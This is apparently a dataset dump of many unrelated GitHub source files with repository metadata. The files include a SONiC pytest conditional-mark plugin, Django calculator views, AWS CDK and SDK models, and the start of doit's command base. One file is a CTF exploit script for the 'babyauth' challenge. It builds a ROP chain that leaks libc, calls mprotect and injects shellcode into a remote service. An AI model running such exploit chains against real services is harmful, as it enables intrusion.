results['BGP_VOQ_CHASSIS_NEIGHBOR'] = output_fields.get('BGP_VOQ_CHASSIS_NEIGHBOR', {})
results['INTERFACE'] = output_fields.get('INTERFACE', {})
except Exception as e:
logger.error('Failed to load config basic facts, exception: {}'.format(repr(e)))
return results
def load_switch_capabilities_facts(inv_name, dut_name):
"""Run 'ansible -m switch_capabilities_facts' command to get some basic config facts.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
inv_name (str): The name of inventory.
dut_name (str): The name of dut.
Returns:
dict or None: Return the minigraph basic facts dict or None if something went wrong.
"""
results = {}
logger.info('Getting switch capabilities basic facts')
try:
# get switch capabilities basic faces
ansible_cmd = "ansible -m switch_capabilities_facts -i ../ansible/{} {}".format(inv_name, dut_name)
raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
logger.debug('raw switch capabilities basic facts:\n{}'.format(raw_output))
output_fields = raw_output.split('SUCCESS =>', 1)
if len(output_fields) >= 2:
output_fields = json.loads(output_fields[1].strip())['ansible_facts']['switch_capabilities']
results['switch'] = output_fields.get('switch', {})
except Exception as e:
logger.error('Failed to load switch capabilities basic facts, exception: {}'.format(repr(e)))
return results
def load_console_facts(inv_name, dut_name):
"""Run 'ansible -m console_facts' command to get some basic console facts.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
inv_name (str): The name of inventory.
dut_name (str): The name of dut.
Returns:
dict or None: Return the minigraph basic facts dict or None if something went wrong.
"""
results = {}
logger.info('Getting console basic facts')
try:
# get console basic faces
ansible_cmd = "ansible -m console_facts -i ../ansible/{} {}".format(inv_name, dut_name)
raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
logger.debug('raw console basic facts:\n{}'.format(raw_output))
output_fields = raw_output.split('SUCCESS =>', 1)
if len(output_fields) >= 2:
output_fields = json.loads(output_fields[1].strip())['ansible_facts']['console_facts']
results = output_fields
except Exception as e:
logger.error('Failed to load console basic facts, exception: {}'.format(repr(e)))
return results
def load_basic_facts(session):
"""Load some basic facts that can be used in condition statement evaluation.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
session (obj): Pytest session object.
Returns:
dict: Dict of facts.
"""
results = {}
testbed_name = session.config.option.testbed
testbed_file = session.config.option.testbed_file
tbinfo = TestbedInfo(testbed_file).testbed_topo.get(testbed_name, None)
results['topo_type'] = tbinfo['topo']['type']
results['topo_name'] = tbinfo['topo']['name']
results['testbed'] = testbed_name
dut_name = tbinfo['duts'][0]
if session.config.option.customize_inventory_file:
inv_name = session.config.option.customize_inventory_file
elif 'inv_name' in list(tbinfo.keys()):
inv_name = tbinfo['inv_name']
else:
inv_name = 'lab'
# Since internal repo add vendor test support, add check to see if it's sonic-os, other wise skip load facts.
vendor = session.config.getoption("--dut_vendor", "sonic")
if vendor == "sonic":
# Load DUT basic facts
_facts = load_dut_basic_facts(inv_name, dut_name)
if _facts:
results.update(_facts)
# Load minigraph basic facts
_facts = load_minigraph_facts(inv_name, dut_name)
if _facts:
results.update(_facts)
# Load config basic facts
_facts = load_config_facts(inv_name, dut_name)
if _facts:
results.update(_facts)
# Load switch capabilities basic facts
_facts = load_switch_capabilities_facts(inv_name, dut_name)
if _facts:
results.update(_facts)
# Load console basic facts
_facts = load_config_facts(inv_name, dut_name)
if _facts:
results.update(_facts)
# Load possible other facts here
return results
def find_longest_matches(nodeid, conditions):
"""Find the longest matches of the given test case name in the conditions list.
This is similar to longest prefix match in routing table. The longest match takes precedence.
Args:
nodeid (str): Full test case name
conditions (list): List of conditions
Returns:
str: Longest match test case name or None if not found
"""
longest_matches = []
max_length = -1
for condition in conditions:
# condition is a dict which has only one item, so we use condition.keys()[0] to get its key.
if nodeid.startswith(list(condition.keys())[0]):
length = len(condition)
if length > max_length:
max_length = length
longest_matches = []
longest_matches.append(condition)
elif length == max_length:
longest_matches.append(condition)
return longest_matches
def update_issue_status(condition_str, session):
"""Replace issue URL with 'True' or 'False' based on its active state.
If there is an issue URL is found, this function will try to query state of the issue and replace the URL
in the condition string with 'True' or 'False' based on its active state.
The issue URL may be Github, Jira, Redmine, etc.
Args:
condition_str (str): Condition string that may contain issue URLs.
session (obj): Pytest session object, for getting cached data.
Returns:
str: New condition string with issue URLs already replaced with 'True' or 'False'.
"""
issues = re.findall('https?://[^ )]+', condition_str)
if not issues:
logger.debug('No issue specified in condition')
return condition_str
issue_status_cache = session.config.cache.get('ISSUE_STATUS', {})
unknown_issues = [issue_url for issue_url in issues if issue_url not in issue_status_cache]
if unknown_issues:
results = check_issues(unknown_issues)
issue_status_cache.update(results)
session.config.cache.set('ISSUE_STATUS', issue_status_cache)
for issue_url in issues:
if issue_url in issue_status_cache:
replace_str = str(issue_status_cache[issue_url])
else:
# Consider the issue as active anyway if unable to get issue state
replace_str = 'True'
condition_str = condition_str.replace(issue_url, replace_str)
return condition_str
def evaluate_condition(dynamic_update_skip_reason, mark_details, condition, basic_facts, session):
"""Evaluate a condition string based on supplied basic facts.
Args:
dynamic_update_skip_reason(bool): Dynamically update the skip reason based on the conditions, if it is true,
it will update the skip reason, else will not.
mark_details (dict): The mark detail infos specified in the mark conditions file.
condition (str): A raw condition string that can be evaluated using python "eval()" function. The raw condition
string may contain issue URLs that need further processing.
basic_facts (dict): A one level dict with basic facts. Keys of the dict can be used as variables in the
condition string evaluation.
session (obj): Pytest session object, for getting cached data.
Returns:
bool: True or False based on condition string evaluation result.
"""
if condition is None or condition.strip() == '':
return True # Empty condition item will be evaluated as True. Equivalent to be ignored.
condition_str = update_issue_status(condition, session)
try:
condition_result = bool(eval(condition_str, basic_facts))
if condition_result and dynamic_update_skip_reason:
mark_details['reason'].append(condition)
return condition_result
except Exception:
logger.error('Failed to evaluate condition, raw_condition={}, condition_str={}'.format(
condition,
condition_str))
return False
def evaluate_conditions(dynamic_update_skip_reason, mark_details, conditions, basic_facts,
conditions_logical_operator, session):
"""Evaluate all the condition strings.
Evaluate a single condition or multiple conditions. If multiple conditions are supplied, apply AND or OR
logical operation to all of them based on conditions_logical_operator(by default AND).
Args:
dynamic_update_skip_reason(bool): Dynamically update the skip reason based on the conditions, if it is true,
it will update the skip reason, else will not.
mark_details (dict): The mark detail infos specified in the mark conditions file.
conditions (str or list): Condition string or list of condition strings.
basic_facts (dict): A one level dict with basic facts. Keys of the dict can be used as variables in the
condition string evaluation.
conditions_logical_operator (str): logical operator which should be applied to conditions(by default 'AND')
session (obj): Pytest session object, for getting cached data.
Returns:
bool: True or False based on condition strings evaluation result.
"""
if dynamic_update_skip_reason:
mark_details['reason'] = []
if isinstance(conditions, list):
# Apply 'AND' or 'OR' operation to list of conditions based on conditions_logical_operator(by default 'AND')
if conditions_logical_operator == 'OR':
return any([evaluate_condition(dynamic_update_skip_reason, mark_details, c, basic_facts, session)
for c in conditions])
else:
return all([evaluate_condition(dynamic_update_skip_reason, mark_details, c, basic_facts, session)
for c in conditions])
else:
if conditions is None or conditions.strip() == '':
return True
return evaluate_condition(dynamic_update_skip_reason, mark_details, conditions, basic_facts, session)
def pytest_collection(session):
"""Hook for loading conditions and basic facts.
The pytest session.config.cache is used for caching loaded conditions and basic facts for later use.
Args:
session (obj): Pytest session object.
"""
# Always clear cached conditions of previous run.
session.config.cache.set('TESTS_MARK_CONDITIONS', None)
if session.config.option.ignore_conditional_mark:
logger.info('Ignore conditional mark')
return
conditions = load_conditions(session)
if conditions:
session.config.cache.set('TESTS_MARK_CONDITIONS', conditions)
# Only load basic facts if conditions are defined.
get_basic_facts(session)
def pytest_collection_modifyitems(session, config, items):
"""Hook for adding marks to test cases based on conditions defind in a centralized file.
Args:
session (obj): Pytest session object.
config (obj): Pytest config object.
items (obj): List of pytest Item objects.
"""
conditions = config.cache.get('TESTS_MARK_CONDITIONS', None)
if not conditions:
logger.debug('No mark condition is defined')
return
basic_facts = config.cache.get('BASIC_FACTS', None)
if not basic_facts:
logger.debug('No basic facts')
return
logger.info('Available basic facts that can be used in conditional skip:\n{}'.format(
json.dumps(basic_facts, indent=2)))
dynamic_update_skip_reason = session.config.option.dynamic_update_skip_reason
for item in items:
longest_matches = find_longest_matches(item.nodeid, conditions)
if longest_matches:
logger.debug('Found match "{}" for test case "{}"'.format(longest_matches, item.nodeid))
for match in longest_matches:
# match is a dict which has only one item, so we use match.values()[0] to get its value.
for mark_name, mark_details in list(list(match.values())[0].items()):
conditions_logical_operator = mark_details.get('conditions_logical_operator', 'AND').upper()
add_mark = False
if not mark_details:
add_mark = True
else:
mark_conditions = mark_details.get('conditions', None)
if not mark_conditions:
# Unconditionally add mark
add_mark = True
else:
add_mark = evaluate_conditions(dynamic_update_skip_reason, mark_details, mark_conditions,
basic_facts, conditions_logical_operator, session)
if add_mark:
reason = ''
if mark_details:
reason = mark_details.get('reason', '')
if isinstance(reason, list):
if conditions_logical_operator == "AND":
reason = " and\n".join(reason)
else:
reason = " or\n".join(reason)
if mark_name == 'xfail':
strict = False
if mark_details:
strict = mark_details.get('strict', False)
mark = getattr(pytest.mark, mark_name)(reason=reason, strict=strict)
# To generate xfail property in the report xml file
item.user_properties.append(('xfail', strict))
else:
mark = getattr(pytest.mark, mark_name)(reason=reason)
logger.debug('Adding mark {} to {}'.format(mark, item.nodeid))
item.add_marker(mark)
| [
"noreply@github.com"
] | stephenxs.noreply@github.com |
a8313acf22c9a36cb5066ecbeff2d5ab7d53015b | 5203d58b0e00caff0f716c68549072dabfc99fe2 | /specs/dev/swift_nrpe/simple_nonha/scale_out_swift_proxy.py | 0f3e1e9ef2bf11cb3d8ac8f8e49be673d3ab2b07 | [] | no_license | openstack-charmers/openstack-mojo-specs | 800a87280a55313bca7aec6dedc72b6097cad91f | c2224c595b0a264f24b145938ca2734c14dbbea6 | refs/heads/master | 2021-10-09T03:43:00.063224 | 2021-10-08T14:20:23 | 2021-10-08T14:20:23 | 126,203,312 | 3 | 9 | null | 2021-10-08T14:20:23 | 2018-03-21T15:50:04 | Python | UTF-8 | Python | false | false | 49 | py | ../../../../helper/setup/scale_out_swift_proxy.py | [
"liam.young@canonical.com"
] | liam.young@canonical.com |
eb0d0e43a90927231bac66479c5d230cec59cd25 | 29e2afe487acefdc17ae4b16def495632d479be3 | /morpfw/crud/__init__.py | d38eadc21aafd253567055f77b655f7f0266a68c | [] | no_license | brainysmurf/morpfw | fd2a40b660bef00b9cc0a142cbfdcb8d37620f2b | a8d5e3fa57a8d66b61840f113ba54f6c1fcf60d0 | refs/heads/master | 2020-04-10T08:26:20.123425 | 2018-12-07T09:59:43 | 2018-12-07T09:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import morepath
from .app import App
from . import subscribers
from .app import Session
import argparse
import yaml
import sqlalchemy
import os
from .model import Collection, Model
from .rulesadapter import Adapter
from .schema import Schema
from .model import StateMachine
from .util import resolve_model
from .app import App
from .storage.sqlstorage import SQLStorage
from zope.sqlalchemy import register as register_session
def run():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--settings', default='settings.yml')
args = parser.parse_args()
with open(args.settings) as cf:
settings = yaml.load(cf)
application = create_app(App, settings)
# start app
morepath.run(application)
def create_app(app, settings, sqlalchemy_session=Session,
sqlalchemy_bases=None):
sqlalchemy_bases = sqlalchemy_bases or []
register_session(sqlalchemy_session)
# initialize SQLAlchemy
if 'sqlalchemy' in settings:
cwd = os.getcwd()
engine = sqlalchemy.create_engine(
settings['sqlalchemy']['dburi'] % {'here': cwd})
sqlalchemy_session.configure(bind=engine)
# initialize app
app.init_settings(settings)
morepath.commit(app)
morepath.autoscan()
app.commit()
application = app()
# create tables
if 'sqlalchemy' in settings:
for base in sqlalchemy_bases:
base.metadata.create_all(engine)
return application
if __name__ == '__main__':
run()
| [
"kagesenshi.87@gmail.com"
] | kagesenshi.87@gmail.com |
dde7bfd72a9c08bfffad33758d1137ddd7fa93d0 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/501.py | a8f69f0a69a63542706fc8e3cfa8c19f65f8686a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*- coding: utf-8 -*-
import sys
fin = sys.stdin
T = int(fin.readline())
for case in range(1,T+1):
(N,k) = map(int, fin.readline().split())
m = pow(2,N)
#print m
if (k+1) % m == 0:
print "Case #%d: ON" % (case)
else:
print "Case #%d: OFF" % (case)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
41106cde601cc1c35e636198ff7b8dd1a03de755 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/couchbase_cluster.py | bfa8f347c5dc05f02dbd954e2bd179bc7848972b | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 1,325 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
class CouchbaseCluster(object):
"""Implementation of the 'CouchbaseCluster' model.
Specifies an Object containing information about a couchbase cluster.
Attributes:
seeds (list of string): Seeds of this Couchbase Cluster.
"""
# Create a mapping from Model property names to API property names
_names = {
"seeds":'seeds',
}
def __init__(self,
seeds=None,
):
"""Constructor for the CouchbaseCluster class"""
# Initialize members of the class
self.seeds = seeds
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
seeds = dictionary.get("seeds")
# Return an object of this model
return cls(
seeds
) | [
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c7c44980d93edb211bcc3294467a393395be5804 | f4912e5b302f9a9fe013a7ddefe18a599fd1715d | /app_stacks/vpc_stack.py | a595a79091241b7a77efb093e5fcf86043fcc5b0 | [] | no_license | miztiik/xray-lambda-profiler | 5c49d9e4ffcd116fc76f9a7cf5c4c7e0ea9cc45a | 5f7add49d832899e01dd54b72c1478efa9f6853f | refs/heads/master | 2021-04-11T17:07:45.722949 | 2020-08-30T13:06:14 | 2020-08-30T13:06:14 | 249,039,624 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,634 | py | from aws_cdk import aws_ec2 as _ec2
from aws_cdk import core
class global_args:
'''
Helper to define global statics
'''
OWNER = 'MystiqueAutomation'
ENVIRONMENT = 'production'
REPO_NAME = 'xray-lambda-profiler'
SOURCE_INFO = f'https://github.com/miztiik/{REPO_NAME}'
VERSION = '2020_03_21'
class VpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, from_vpc_name=None, ** kwargs) -> None:
super().__init__(scope, id, **kwargs)
if from_vpc_name is not None:
self.vpc = _ec2.Vpc.from_lookup(
self, "vpc",
vpc_name=from_vpc_name
)
else:
self.vpc = _ec2.Vpc(
self,
"miztVpc",
cidr="10.10.0.0/16",
max_azs=2,
nat_gateways=0,
subnet_configuration=[
_ec2.SubnetConfiguration(
name="public", cidr_mask=24, subnet_type=_ec2.SubnetType.PUBLIC
),
# _ec2.SubnetConfiguration(
# name="app", cidr_mask=24, subnet_type=_ec2.SubnetType.PRIVATE
# ),
_ec2.SubnetConfiguration(
name="db", cidr_mask=24, subnet_type=_ec2.SubnetType.ISOLATED
)
]
)
output_0 = core.CfnOutput(
self,
"AutomationFrom",
value=f"{global_args.SOURCE_INFO}",
description="To know more about this automation stack, check out our github page."
)
| [
"13oct08@quantumfoam.uni.cc"
] | 13oct08@quantumfoam.uni.cc |
c5356e8a8533dcf0eb957bc66cfbfc82385a9321 | 05b418ec539a1df81e7b356cac33bb96fcb26b5c | /CroPy/plants.py | 127d89b3147314a4d622f55c51df5aeea8c27ac3 | [] | no_license | rjcmarkelz/CroPy | 7aff37797936b9ca676facbe9eb3bd7ea6443c09 | cc18da80ea3431783b074053f3183debc31043ba | refs/heads/master | 2021-01-10T05:10:10.677352 | 2016-01-04T05:33:34 | 2016-01-04T05:33:34 | 46,379,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | class Plant(object):
def __init__(self):
self._observers = []
def attach(self, observer):
if observer not in self._observers:
self._observers.append(observer)
def notify(self, modifier=None):
for observer in self._observers:
if modifier != observer:
observer.update(self)
class Organ(Plant):
def __init__(self, name=''):
Plant.__init__(self)
self.name = name
self._carbon = 10
self._length = 10
self._photo = 3
@property
def carbon(self):
return self._carbon
@carbon.setter
def carbon(self, value):
self._carbon = value
self.notify()
@property
def length(self):
return self._length
@length.setter
def length(self, value):
self._length = value
self.notify()
@property
def photo(self):
return self._photo
@photo.setter
def photo(self, value):
self._photo = value
self.notify()
class CarbView:
def __init__(self, name=''):
self.name = name
def update(self, plant):
print('%s has %d carbon' % (plant.name, plant.carbon))
print('%s has %d length' % (plant.name, plant.length))
print('%s has %d photo' % (plant.name, plant.photo))
print(plant.length*plant.photo)
| [
"rjmarkelz@ucdavis.edu"
] | rjmarkelz@ucdavis.edu |
cf95d8797fffba43060c2f90f9dc5f76f00f38e7 | b07a69b7a82f4bd22501908501b4b6ff3c1f2a94 | /week15_and_onwards/MySite/mysite/mysite/views.py | 16156c186c2c57064ddb40e566f3e00ad26b857f | [] | no_license | PetosPy/hackbulgaria_python | 8c1103ceefc4f832c42996a86fb351bfc951797c | d7212f35cd448e55009141bd6e42b55f7f05779b | refs/heads/master | 2023-02-28T16:40:22.828545 | 2017-02-15T15:06:28 | 2017-02-15T15:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,694 | py | from math import factorial
from django.shortcuts import render, redirect
from django.http import HttpRequest, HttpResponse
from mysite.utils.rle_compressor import compress, decompress
from mysite.utils.calculator import get_nth_fibonacci_numbers, get_nth_prime_numbers, gen_primes
def get_index(request):
return render(request, 'index.html', request.session)
# @/calculateNFactorial
def calc_n_factorial(request: HttpRequest):
n = request.POST.get('n_fac', '')
try:
n = int(n)
request.session['wanted_n_fac'] = n
request.session['n_factorial'] = factorial(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/calculateNthFibonacci
def calc_nth_fibonacci_numbers(request: HttpRequest):
""" Calculate the fibonacci numbers up to n"""
n = request.POST.get('n_fib', '')
try:
n = int(n)
if n <= 0:
request.session['error_msg'] = 'The input must be a positive integer!'
return redirect('index')
request.session['wanted_n_fibonaccis'] = n
request.session['fibonaccis'] = get_nth_fibonacci_numbers(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/calculateNthPrimes
def calc_nth_primes(request: HttpResponse):
""" Calculate the first N prime numbers """
n = request.POST.get('n_primes', '')
try:
n = int(n)
if n > 1000 or n < 1:
request.session['error_msg'] = 'The input must be between 1 and 1000!'
return redirect('index')
request.session['wanted_n_primes'] = n
request.session['primes'] = get_nth_prime_numbers(n)
except ValueError:
request.session['error_msg'] = 'The input must be a valid integer!'
return redirect('index')
# @/encodeRL
def encode_rl(request: HttpResponse):
string = request.POST.get('str_to_encode', '')
try:
encoded_str = compress(string)
except ValueError as e:
request.session['error_msg'] = str(e)
return redirect('index')
request.session['wanted_enc_str'] = string
request.session['encoded_str'] = encoded_str
return redirect('index')
# @/decodeRL
def decode_rl(request: HttpResponse):
encoded_string = request.POST.get('str_to_decode', '')
try:
decoded_str = decompress(encoded_string)
except ValueError as e:
request.session['error_msg'] = str(e)
return redirect('index')
request.session['wanted_dec_str'] = encoded_string
request.session['decoded_str'] = decoded_str
return redirect('index')
| [
"familyguyuser192@windowslive.com"
] | familyguyuser192@windowslive.com |
8c61aacae9721743fc2841b847755e4a17fce0e8 | fbde0e2a0c93193949db891b6633a5f61ad9f61b | /backend/home/migrations/0001_load_initial_data.py | 99c69f7d511bef2f5fc5e145ed104df74edc71db | [] | no_license | crowdbotics-apps/test-26691 | 7198419c0a613e6702c71cb568ce3bbf737d33aa | 4a6756c674919dd695b059594726f2093627f0f8 | refs/heads/master | 2023-04-20T17:56:38.407147 | 2021-05-14T12:02:01 | 2021-05-14T12:02:01 | 367,349,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "test-26691.botics.co"
site_params = {
"name": "test",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
014cf8b22ad535325e225718a87d99269363befe | d51b4c766661af65b4ee6e7c30f8cb4bdd8603e3 | /python/algorithm/leetcode/49.py | d9f5c2be72952c7ae5dda1bf600f8c4d534d1acc | [] | no_license | yanxurui/keepcoding | 3e988c76b123d55b32cf7cc35fbffb12c4ccb095 | d6b9f07e2d1437681fa77fee0687ea9b83cab135 | refs/heads/master | 2021-01-24T09:01:41.306597 | 2020-05-21T05:36:04 | 2020-05-21T05:36:04 | 93,400,267 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from collections import defaultdict
class Solution(object):
def groupAnagrams(self, strs):
"""
:type strs: List[str]
:rtype: List[List[str]]
"""
ans = defaultdict(list)
for w in strs:
ans[''.join(sorted(w))].append(w)
return list(ans.values())
if __name__ == '__main__':
from testfunc import test
def sort_nest(L):
for i in range(len(L)):
if isinstance(L[i], list):
L[i] = sort_nest(L[i])
return sorted(L)
def compare(a, b):
'''compare 2 unordered nested list
'''
return len(a) == len(b) and sort_nest(a) == sort_nest(b)
test_data = [
(
["eat", "tea", "tan", "ate", "nat", "bat"],
[
["ate","eat","tea"],
["nat","tan"],
["bat"]
]
)
]
test(Solution().groupAnagrams, test_data, compare=compare)
| [
"617080352@qq.com"
] | 617080352@qq.com |
51b676bf10693d8682cd739f5ef4b22908e3fe8a | a140b1c2cfcc4d9fe7d4a9fcd51f86bf8d89e41c | /2020.12.11-ASIS_CTF_Finals_2020/babyauth/v00-shellcode.py | 050b95f05ac57989f98ded6682c22009c8eb7789 | [] | no_license | xcode2010/ctf | 6f0e6f76e7cdbe44842576ec49dbbffe0de91a49 | 2c121f1e1171ff0f42a4edfb7a17261cc673adb5 | refs/heads/master | 2023-03-28T07:34:33.695719 | 2021-03-21T17:38:55 | 2021-03-21T18:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | #!/usr/bin/env python3
from pwn import *
PERCENT_S_NEWLINE = 0x4019c8
POP_RSI_RET = 0x4017fa
POP_RDI_RET = 0x4019a3
PRINTF_CHK_GOT = 0x603090
RET = 0x401545
USERNAME_READER = 0x4014c0
PRINTF_CHK_LIBC = 0x131040
MPROTECT_LIBC = 0x11bb00
WORK_PAGE = 0x603000
WORK_ADDR = 0x603150
WORK_SIZE = 0xeb0
PAGE_SIZE = 0x1000
POP_RSP_RET = 0x401063
MOV_RDI_R12_CALL_RBP = 0x40183c
POP_RBP_RET = 0x400f08
READ_LIBC = 0x111130
context.arch = 'amd64'
STAGE3 = asm(r'''
mov rax, 1
mov rdi, 1
lea rsi, [.str + rip]
mov rdx, .str_end - .str
syscall
.str:
.asciz "hello from asm\n"
.str_end:
''')
def connect():
if args.LOCAL:
return process(['./server.py'])
else:
return remote('69.90.132.134', 3317)
def scanf_ok(x):
# https://reverseengineering.stackexchange.com/a/10596
return b'\x09' not in x and \
b'\x0a' not in x and \
b'\x0b' not in x and \
b'\x0c' not in x and \
b'\x0d' not in x and \
b'\x20' not in x
def send_stage1(tube):
tube.recvuntil(b'Username: ')
payload = flat({
0: b'admin\0',
0x38: b''.join((
struct.pack('<QQ', POP_RDI_RET, 1),
struct.pack('<QQ', POP_RSI_RET, PERCENT_S_NEWLINE),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, PRINTF_CHK_GOT, 0, 0),
# call ___printf_chk; pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8a, 0, 0, 0),
# it just so happens that r12 == IPC *, so we can restart
struct.pack('<QQ', POP_RBP_RET, USERNAME_READER),
struct.pack('<Q', MOV_RDI_R12_CALL_RBP),
)),
})
assert scanf_ok(payload), payload.hex()
# input('stage1')
tube.sendline(payload)
printf_chk, = struct.unpack('<Q', tube.recvn(6).ljust(8, b'\x00'))
libc = printf_chk - PRINTF_CHK_LIBC
print(f'libc: 0x{libc:x}')
assert libc & 0xfff == 0
return libc
def send_stage2(tube, libc):
tube.recvuntil(b'Username: ')
payload = flat({
0: b'admin\0',
0x38: b''.join((
struct.pack('<QQ', POP_RDI_RET, WORK_PAGE),
struct.pack('<QQ', POP_RSI_RET, PAGE_SIZE),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, 0x7, 0, 0),
struct.pack('<Q', libc + MPROTECT_LIBC),
struct.pack('<QQ', POP_RDI_RET, 0),
struct.pack('<QQ', POP_RSI_RET, WORK_ADDR),
# pop rdx; mov eax, 1; pop rbx; pop rbp; retn
struct.pack('<QQQQ', 0x400e8f, WORK_SIZE, 0, 0),
struct.pack('<Q', RET),
struct.pack('<Q', libc + READ_LIBC),
struct.pack('<Q', RET),
struct.pack('<Q', WORK_ADDR),
))
})
assert scanf_ok(payload)
# input('stage2')
tube.sendline(payload)
def pwn_once(tube):
libc = send_stage1(tube)
send_stage2(tube, libc)
# input('stage3')
tube.send(STAGE3)
def main():
with connect() as tube:
pwn_once(tube)
tube.interactive()
if __name__ == '__main__':
main()
| [
"mephi42@gmail.com"
] | mephi42@gmail.com |
fcb0ab1bb1d2a7526816655e9c3d133f73dbf1d2 | 9940f0b40f439a7aac3f58089602f26533ade000 | /Ex_Files_RESTful_Web_APIs_Django/Exercise Files/env/lib/python3.7/encodings/cp1255.py | cc8a5a597758f7c8d164dec2cff5a94b7826c421 | [] | no_license | Mosh333/REST_API_in_Django | 948ef0efd3a6a146bd94d148aa8c012ec929af68 | 7703501d5ad5bb14fefe5f734ab5780c11f400c9 | refs/heads/master | 2022-11-27T03:23:39.796926 | 2022-03-12T16:10:43 | 2022-03-12T16:10:43 | 246,197,842 | 0 | 0 | null | 2022-11-22T10:14:06 | 2020-03-10T03:18:04 | Python | UTF-8 | Python | false | false | 1,067 | py | XSym
0107
0760a0cdb76900a66edc55d0c3f5a80c
/usr/local/Cellar/python/3.7.2_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/encodings/cp1255.py
| [
"howladermoshiur@gmail.com"
] | howladermoshiur@gmail.com |
a1a379a55c101ba392210109d8b279c357d5eff1 | 8dd0191025c90e0c2fe11c9720c37a06d5bd1ca6 | /doit/cmd_base.py | 2b62e24181cb13a79275a291961bc0066cbc951d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | NiKo-jr/doit | bfda91771d55c93ca41819bac73557c032b011d4 | b29fdb15a47406bdcbd024f40f7ec56003269b72 | refs/heads/master | 2021-05-11T11:09:07.962317 | 2018-01-19T12:29:47 | 2018-01-19T12:29:47 | 118,121,376 | 0 | 0 | null | 2018-01-19T12:14:08 | 2018-01-19T12:14:08 | null | UTF-8 | Python | false | false | 14,867 | py | import inspect
import sys
from collections import deque
from . import version
from .cmdparse import CmdOption, CmdParse
from .exceptions import InvalidCommand, InvalidDodoFile
from .dependency import CHECKERS, DbmDB, JsonDB, SqliteDB, Dependency
from .plugin import PluginDict
from . import loader
def version_tuple(ver_in):
"""convert a version string or tuple into a 3-element tuple with ints
Any part that is not a number (dev0, a2, b4) will be converted to -1
"""
result = []
if isinstance(ver_in, str):
parts = ver_in.split('.')
else:
parts = ver_in
for rev in parts:
try:
result.append(int(rev))
except:
result.append(-1)
assert len(result) == 3
return result
class Command(object):
"""third-party should subclass this for commands that do no use tasks
:cvar name: (str) name of sub-cmd to be use from cmdline
:cvar doc_purpose: (str) single line cmd description
:cvar doc_usage: (str) describe accepted parameters
:cvar doc_description: (str) long description/help for cmd
:cvar cmd_options:
(list of dict) see cmdparse.CmdOption for dict format
"""
# if not specified uses the class name
name = None
# doc attributes, should be sub-classed
doc_purpose = ''
doc_usage = ''
doc_description = None # None value will completely omit line from doc
# sequence of dicts
cmd_options = tuple()
# `execute_tasks` indicates whether this command execute task's actions.
# This is used by the loader to indicate when delayed task creation
# should be used.
execute_tasks = False
def __init__(self, config=None, bin_name='doit', **kwargs):
"""configure command
:param bin_name: str - name of command line program
:param config: dict
Set extra configuration values, this vals can come from:
* directly passed when using the API - through DoitMain.run()
* from an INI configuration file
"""
self.bin_name = bin_name
self.name = self.get_name()
# config includes all option values and plugins
self.config = config if config else {}
self._cmdparser = None
# config_vals contains cmd option values
self.config_vals = {}
if 'GLOBAL' in self.config:
self.config_vals.update(self.config['GLOBAL'])
if self.name in self.config:
self.config_vals.update(self.config[self.name])
# Use post-mortem PDB in case of error loading tasks.
# Only available for `run` command.
self.pdb = False
@classmethod
def get_name(cls):
"""get command name as used from command line"""
return cls.name or cls.__name__.lower()
@property
def cmdparser(self):
"""get CmdParser instance for this command
initialize option values:
- Default are taken from harded option definition
- Defaults are overwritten from user's cfg (INI) file
